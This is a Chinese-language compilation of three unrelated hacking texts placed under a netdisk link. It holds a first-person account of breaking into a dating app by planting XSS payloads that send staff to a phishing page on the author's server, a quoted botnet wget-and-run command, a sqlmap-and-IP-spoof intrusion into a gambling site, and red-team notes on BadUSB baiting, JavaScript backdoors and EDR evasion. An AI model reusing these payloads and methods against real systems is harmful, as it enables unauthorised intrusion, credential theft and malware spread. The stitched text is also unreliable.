链接：https://pan.baidu.com/s/1HYMinJun2QxkPLbP9eZPOg
提取码：rxul

前言

无聊寂寞（这不是重点），去应用市场上下载了某个同城约x软件，点开软件，首先不需要登录/注册就可以进来。。就感觉发现有问题了。

主界面是长这样的，类似探探一样可以选择心动或者忽略，忽略之后就会蹦出下一个女生的照片：

瞎划几下，就有一堆女的找我聊天，直觉告诉我这肯定是机器人：

注入点

在设置中心 -> 反馈建议处插入 xss payload：

<script src=http://t.cn/xxxx></script>

接收cookie信息

很快就可以接收到一些 cookie 信息，但是点开之后发现少了 JSESSIONID，无法直接登录到后台：

很显然是开启了 http-only：

访问一下页面：

弱口令尝试了登录不了。。爆破也没有结果，也不存在注入点。
遇到这种情况一种是两种思路：绕过 http-only 或者构造钓鱼网站，让受害者去输入账号和密码。这里我选择了后者。

构造钓鱼页面

首先构造一个和登录界面一样的页面，将源码的 js、css 下载放在本地即可。

将登录处的代码的 action 改成当前目录下的 get_data.php 文件用来接收账号和密码：

get_data.php：

接着只要构造 xss payload：

<script>window.location.href="http://xxxxxx:8080/login.html"</script>

（xxxxxx 是我自己的 vps 服务器）
使用 php 开一个 web 服务即可：

php -S 0.0.0.0:8080 -t ./

最后的效果是这样的，报一个登录超时，让受害者重新输入密码，注入完了密码之后，重新跳转回原来正常的登录页面：

等待输入

将 xss payload 插入反馈的页面，之后等待输入即可。

客服早上 10 点才上班，我大概 9 点多的时候开启了服务，这里比较好玩的是我还抓到了别的东西：

一个美国的 ip 访问了我的服务，是一个比较奇怪的链接，仔细一看这个就是抓肉鸡的链接：

shell?cd+/tmp;wget+http:/\/185.62.188.45/jaws.sh+-O+-+>.ske.sh;chmod+777+.ske.sh;sh+.ske.sh

搜索了一下 jaws ，这个是摄像头的一个牌子，在 1.0 版本下的 /shell 路径存在一个命令执行漏洞，很显然这个就是批量抓肉鸡了。C2C 服务器是 185.62.188.45。

上钩

我就等啊等，到 9.58 的时候，发现那边已经访问了我的链接，应该是客服准时上班了，但是他过了几分钟也没有点击登录进来，一直在登录界面观望（没有访问 get_data.php 说明他没有输入密码），我就觉得他应该是起了疑心了吧。

正在我准备放弃的时候，我发现有另外一个 IP 访问了我的服务器，而且还输入了密码（怀疑这里是他发现登录不上的时候询问了管理员，管理员一顿操作直接看也不看就登录上）！！赶紧看看日志：

激动的发现就是 admin 账号！

登录后台

拿到账号密码赶紧登录一波，看了一下果然是最高管理员的权限，并且菜单的功能还挺多的：

先习惯性看一下用户反馈，果然不出所料，肯定是一堆机器人。。。这不坑骗广大男同胞吗？

下面的一些截图也可以证明：

查询机器人的数量 11089：

正常女性用户这里是 115 名，而且不包括男性朋友选择了女性角色的情况，所以这里至少 90% 是机器人，毋庸置疑了：

另外还有一些让人惊讶的地方：
这是从 25 号凌晨开始到 10 点多的订单总额，50w！！！

查了一下昨天 24 号的，200多w！我的天，这流水量超过了我的预期，这骗子软件有这么多人充钱，这些男性都如此饥渴嘛。。傻傻分不清是不是机器人还是真人。。
一周的充值金额数，8 位数！！这他妈比做黑产还赚钱。

这是 AI 自动回复的消息：

想感叹一句，这可够智能的啊：

某日寒风萧萧，正吃着泡面，小组成员丢来一个BC站，说拿到shell请我吃外卖，为了吃顿好的，必须盘它。

山重水复疑无路

先对站点的功能进行了一波浏览，并没有发现什么明显的漏洞。搭建网站的也不是什么常见的cms。
目录扫描 打开御剑和7kbstorm大佬的工具对网站目录进行一波扫描

御剑目录扫描：

7kbstorm目录扫描

扫描结果并没有发现什么敏感目录。

子域名爆破 于是我决定爆破一波子域名，正常情况下，这种小站点的子域名也少得可怜，大多数没有子域名，不过一旦有发现就很可能有重大突破 这里我使用lijiejie的子域名爆破工具。

发现了5个子域名

其中有两个可以正常访问 admin.xxx.com和dl.xxx.com

一处是管理后台admin.xxx.com

另一处是代理管理系统 dl.xxx.com

两个比较之下，代理管理系统连验证码都没有，应该会比较好日。所以先日dl.xxx.com。 弱口令爆破+万能密码尝试 使用burp intruder爆破弱口令，并没有什么收获. 万能密码也登不上。

接下来拦截登录请求，放到sqlmap测试一下是否存在注入，然而并没有注入。 测试到这里，我们整理一下思路：

1.我们可以继续日dl.xxx.com : 尝试爆破敏感目录、扫描端口、查找js文件看看是否存在未授权访问的接口。
2.继续日www.xxx.com；尝试扫描端口、查找js文件
3.日另一个子域admin.xxx.com

柳暗花明又一村

我们选择先日admin.xx.com

尝试使用弱口令amdin 123456登录，抓包发现验证码并没有在请求包中出现，也就是说验证码实际上是无效的，有点兴奋，我们可以使用burp intruder+字典爆破弱口令

又白高兴一场，测试不存在弱口令。 尝试了万能密码并没有什么卵用。 继续拦截登录请求包，放到sqlmap跑sql注入. 这一次sqlmap带来了惊喜，跑出了注入

--dbs跑库

看到库名ManageDB，直觉这就是管理员库 --tables跑出了user表，--dump跑出数据

数据里包括了管理员账号，管理员密码，还有管理员的ip，管理员的最后登录时间。 看到最后登录时间是2019.11.29，看来管理员还是经常登录的。 拿着密文来到cmd5解密一波，真是日了狗了，是个收费密文 来到somd5试一下，解出了明文

回到后台，输入账号和密码登录，然而

卧槽，竟然还验证登录ip。 灵机一动，我想到了刚才和管理员账号密码一起跑出来的管理员ip应该就是允许登陆的ip地址 以我多年CTF的经验，加个X-Forwarded-For头就可以简单伪造ip了，尝试一下

Bingo，登陆成功，CTF诚不我欺~

还有机器人配置这个操作，看来果然是骗子网站

翻了翻后台功能，并没有上传点，也不是常见的cms管理后台，不存在那种表面上被阉割事实上通过url路径还是可以访问的功能。 到这里就结束了吗?

虽然我们找不到上传点，但我们有一处sql注入，可以尝试直接写shell 先看一下是不是dba权限。

哦豁，是dba权限 可惜这是一个sql server数据库，看到网上sqlmap写shell教程里，先选择脚本语言，再选择绝对路径.....我的内心毫无波澜，因为sql server的--os-shell是这样的，和mysql完全不同

得到网站绝对路径的步骤就不说了，因为在这里没什么卵用，当我兴致满满的写shell的时候才发现并没有写权限。

这算哪门子dba权限！不过对于这种BC站，就算发生再魔幻的事情我都能接受。

最后的尝试

用nmap扫一波端口

3389端口没有开，不过1433端口是开放的，我们尝试爆破一波弱口令，看能不能直接连上mssql数据库。之前得到的后台管理密码也要尝试一下，万一和数据库是同一个密码呐。 事实证明我想太多了，不是弱口令，密码也和网站后台不一样。

到了这里，我知道外卖遥不可及，看着已经凉透的泡面，我加了点热水，含泪吃了起来。

这次参加阿里白帽大会,对无声的一个师傅的议题印象比较深刻,ppt暂时不知道会不会共享,我个人想做个总结,最近事情一大堆,学习的效率变慢了许多,不能让这些东西一直压着我.XD

飞机刚起飞,希望到家之前能够写完.

小灰师傅说:"这次由于时间问题,还有很多好玩的没分享出来."
我:"Tql"

以下内容属于我个人YY.

前言

现在各种议题数不胜数,但是我看对眼的比较少.

红队的特点是什么?

区别于传统的渗透测试,更偏向于实战,面对的场景也更加复杂,技术繁多,以目的为导向,需要有能够解决突发问题的能力.

红队的核心是什么?

发散思维,让各种技术有应用场景,需要有更多的攻击面,掌握特殊技巧.

红队之路是什么?

在实践中不断地"填坑",不断实战,完善战术和武器的过程.

大型网络渗透的思路有哪些?

参考来自红队的一些Tricks(小灰师傅的另外一个议题),ppt自行谷歌查找.

撕开口子(ssrf->内网渗透)
判断出目标位置和目标环境
通过osint,获得关键信息,攻击脆弱系统,进入内网.
寻找"软柿子",从邮箱突破 ->获得VPN账号密码->内网渗透->.....

边界渗透

组织业务架构分析(天眼查,主站业务方向,业务合作单位,海外业务)
判断目标网络架构(ssrf,内网ip泄露,citrix,exchange,域认证,云盘,文库,git)
关键业务分析(员工通讯录,密码字典制作,各种oa(泛微,通达,致远,金蝶),mail,vpn,通讯工具,sso)

外网攻击入口选择

关注度低和防护薄弱的系统(边远地区,无MFA机制的系统,使用高危漏洞进行批量)

供应链打击
办公系统,集权系统
有敏感信息泄露的系统
业务线较长的系统(公司的网络结构分布在各个地市,进行迂回攻击)
常见的信息收集

pdns
子域名网段
github检索
爬兄弟域名
app请求
js信息收集
微信公众号
favicon.ico
ssl cert

横|纵向移动

先潜伏,别急于扫描,会触发edr
潜伏策略(dns,icmp,tcp,http,测试机,备份机,老资产,运维终端pc,办公区,业务大,复杂的系统)
内网知识储备(很多人问我内网渗透怎么学好点,我的建议都是去copy dm写的那本书的目录,自己网上查查资料,东西不多,需要实践,不实践你永远不会踩坑,也不会进步)
域渗透基础知识(自行谷歌学习)
内网信息收集(自行谷歌学习)

防御对抗
hw遇到的防护手段 (封ip,waf,白名单机制,各种安全设备(nids,hids,edr,soc,蜜罐),溯源反制)
对策(代理池,cms识别,waf测试与绕过,加载自己的dll,逆向agent,patch掉防火墙等设备,流量加密,虚拟机,心跳包回连,回连cdn,回连端口转发)

Content

"水坑攻击"在红队场景的运用
对抗技术在红队行动中的实践
主被动方式结合-实现挖坑反击
RedTeamer的未来

"水坑攻击"在红队场景的运用

github蜜罐,你遇到过吗?
以及内网的一些常见服务蜜罐.将redis部署在真实环境里,但是redis服务的流量走的是蜜罐系统,导致被防守方逮到.

使用OSINT进行情报搜集

搜索引擎(fofa,shodan,Google,Zoomeye,bing)
百度文库,CSDN
天眼查相关资产
riskiq.com开源情报
子域名,爬虫链接,github
内部情报(加QQ群,钉钉群,微信群)

收集到架构,资产,邮箱,敏感资料,专利,账号密码等等

通过收集的账号密码登录邮箱系统,coremail rce->导出邮件内容->被系统制裁.

tricks

github在设置邮箱的时候可以获得github账户名,脚本批量测试
看图说话

jsonp劫持可以获取目标的互联网信息,qq邮箱,163邮箱等.

供应链攻击,留后门

获取到开发人员权限后,可以选择往源码里插入一段js,等源码部署以后,可以结合xss平台进行权限维持(键盘记录,内网渗透等等)
xss平台beef其实很香的,模块很多.
js后门的好处:

获得代码部署地址
键盘记录
通过ajax动态获得页面内容
通过访问ip分析人员区域
随时更改js内容,做进一步利用,ie浏览器和flash攻击

近源攻击

U盘攻击

直接往人家银行门口扔U盘?你咋知道被谁捡去了,赔钱的买卖.
通过信息收集,和其他的方法找到工作人员地址,比如订单信息泄露,寄一个badusb到他家,往U盘里送上最真挚的祝福,加一个小贺卡,让他快点打开看看U盘里面你对他到底进行了啥祝福.

badusb的一些tricks:

使用unicode反转字符攻击,诱导点击
可执行文件的后缀-dll,hta,bat,sct,vbs,ps1
office漏洞利用和宏攻击
特殊文件后缀名,exe,pif,com,cmd,scr
双击反弹shell文件和脚本,chm,ink,iqy,jsjse,cpl,wsh,wsf

注册表HKEY/LOCALMACHINE/SOFTWARE/Classes中可以找到能执行命令的后缀.

WIFI钓鱼

近源攻击中最为常见的就是路由器,有0day的话可以进行链路劫持,进行行为审计,
看一下无声的这个武器.

可见武器化的好处

一次攻击链:

webrtc获取内网地址
对可以发起http请求导致rce的路由器发起探测
获得权限后,通过流量采集获取某些网站接口的凭据,强制加好友
聊天触发某插件热更新,劫持替换,运行导致收集rce

WIFI登录页面钓鱼

在内网的话,可以获取员工的工号和密码,ACl配置不当的情况下可以扫描内网资源(DNS重定向)
抓hash
dns可控的情况下,结合WPAD进行中继攻击

对抗技术在红队行动中的实践

ip封禁

https://github.com/RhinSecurityLabs/IPRotate_Burp_Extension

通过aws的服务进行ip替换

或者使用pymultitor

DMZ出网的权限维持

常规是使用DNS,HTTP协议

换个思路,直接把邮件服务器当做C2,传递信息回来,相关代码自己github查找

EDR多维度对抗

实时监控是否有特定的进程执行,参数和进程的调用关系树
内存分析
异常检测
流量监测

Bypass(后面几种是我的想法):

参数污染
shellcode分离加载
行为免杀
反沙箱(判断当前环境是否是沙箱,内存,磁盘空间,等等,参考veil模块)
无文件技术(用forfiles免杀)
流量免杀
shellcode加密
blockdll
白加黑利用

权限维持
单机权限维持(这个我最近在写总结,尽快赶出来)

服务类:bitadmin,计划任务,sqlserver job
logon Scripts修改注册表
dll劫持
白加黑利用
服务类路径,通过powerup寻找加以利用

域权限维持

看图,做一个补充

主被动方式实现挖坑反击

内网横向移动技术到底是研究什么?

内网拓扑环境,知道有哪些机器,我现在在哪个位置,下一步我要去哪?
获得当前账户,具有什么权限,受什么规则影响,可以进行什么操作,可以用什么手段横向?
怎么获得更多的用户名和密码以及权限
怎么拿到域内指定的机器(日志,邮件,收集的信息,ldap查询)

护网横向移动优先攻击策略

目标内网往往非常大,快读定位和找到关键节点是攻击的关键,选择的主要原则为:

快速掌握目标网络架构和网络设备及集权系统,(堡垒机,运维管理机,性能监控系统,集中管控系统,域控等)
查找配置文件,系统日志,管理文件,建设方案,wiki,文档云,托管代码等,获取敏感信息,为纵向移动打下基础.

网络环境中的信息收集

dns信息
快速定位域控(方法很多,不多说)
route信息
net view dc
域信息(dc,group,user,密码策略,委派关系,票据,域信任关系)
445端口获取banner判断是否在域内
ldap query
spn扫描
域认证服务机器日志

DNS

使用ping -a反向解析IP
先通过ldap查询获得域内计算机名称,再通过dns查询获得ip
dnscnd的使用

单主机,系统程序,安装软件

系统日志(追踪来源,堡垒机,管理人员电脑)
最近使用的程序
安装应用
浏览器历史记录,浏览器密码,代理配置
系统密码,hash,mscache,rdp连接记录,rdp凭据,vpn,xshell,Navicat,winscp
内存中kerberos票据
其他用户token
session信息
redthief被动获取密码

精准定位

域控日志
系统记录日志
查询用户userWorkstation字段
使用组策略给用户绑定登录脚本
Email

RedTeamer的未来

红队是多元化的,需要有多方面的能力,武器化是重点,学以致用(win32 api,Windows核心编程,c/c++/c#/powershell)
尝试跨界,去了解更多未知的精彩
提高自身业务能力,增加深度,不满足于表面,要有危机感.

我为啥没有具体去介绍文中的技术点呢?

XD

快下飞机了,想家!